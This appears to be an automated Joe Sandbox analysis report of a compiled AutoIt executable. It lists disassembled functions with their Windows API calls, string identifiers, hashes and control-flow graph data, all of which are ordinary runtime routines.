                                                                                                                                                                                                                Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                                                                                • API String ID: 1762048999-758534266
                                                                                                                                                                                                                • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                                                                                                                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                                                                                                                                                                Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                                                                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                                                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                                                                                                                                                • API String ID: 3948761352-1609664196
                                                                                                                                                                                                                • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                                                                                                                                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                                                                                                                                                                Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                • _wcsncat.LIBCMT ref: 0040E433
                                                                                                                                                                                                                • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                                                                                                                                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0040E487
                                                                                                                                                                                                                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00427541
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00427551
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00427562
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0042757C
                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                                                                                                                                • String ID: Include$\
                                                                                                                                                                                                                • API String ID: 3173733714-3429789819
                                                                                                                                                                                                                • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                                                                                                                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                                                                                                                                                                Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _fseek.LIBCMT ref: 0045292B
                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452961
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452971
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                                                                                                                                • _fseek.LIBCMT ref: 004529BF
                                                                                                                                                                                                                • _malloc.LIBCMT ref: 004529CA
                                                                                                                                                                                                                • _malloc.LIBCMT ref: 004529D6
                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                                                                                                                                • _free.LIBCMT ref: 00452A17
                                                                                                                                                                                                                • _free.LIBCMT ref: 00452A20
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1255752989-0
                                                                                                                                                                                                                • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                                                                                                                                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                                                                                                                                                                Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                                                                                                • String ID: FILE
                                                                                                                                                                                                                • API String ID: 3888824918-3121273764
                                                                                                                                                                                                                • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                                                                                                                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                                                                                                                                                                Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                                                                                • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                                                                                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                                                                                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(00A2F2E8,000000FF,00000000), ref: 00410552
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                                                                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                                                                                                                                                                Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                                                                                • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                                                                                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                                                                                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                                                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                                                                                • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                                                                                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                                                                                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                                                                                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                                                                                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                                                                                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                                                                                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                                                                                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A2F2E8,000000FF,00000000), ref: 00410552
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                                                                                                                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                                                                                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                                                                                                                Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _malloc
                                                                                                                                                                                                                • String ID: Default
                                                                                                                                                                                                                • API String ID: 1579825452-753088835
                                                                                                                                                                                                                • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                                                                                                                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                                                                                                                                                                Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1970 40f696-40f69c 1966->1970 1968 40f660-40f674 call 4150d1 1967->1968 1969 40f63e 1967->1969 1974 40f679-40f67c 1968->1974 1971 40f640 1969->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1968 1977->1971 1991 425d43-425d5f call 414d30 1978->1991 1979->1975 1981 40f6b4-40f6c2 1980->1981 1982 40f6af-40f6b2 1980->1982 1984 425d16 1981->1984 1985 40f6c8-40f6d6 1981->1985 1982->1975 1984->1978 1987 425d05-425d0b 1985->1987 1988 40f6dc-40f6df 1985->1988 1987->1973 1990 425d11 1987->1990 1988->1975 1990->1984 1991->1970
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                                                                                                                                • String ID: AU3!$EA06
                                                                                                                                                                                                                • API String ID: 1268643489-2658333250
                                                                                                                                                                                                                • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                                                                                                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                                                                                                                                                                Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
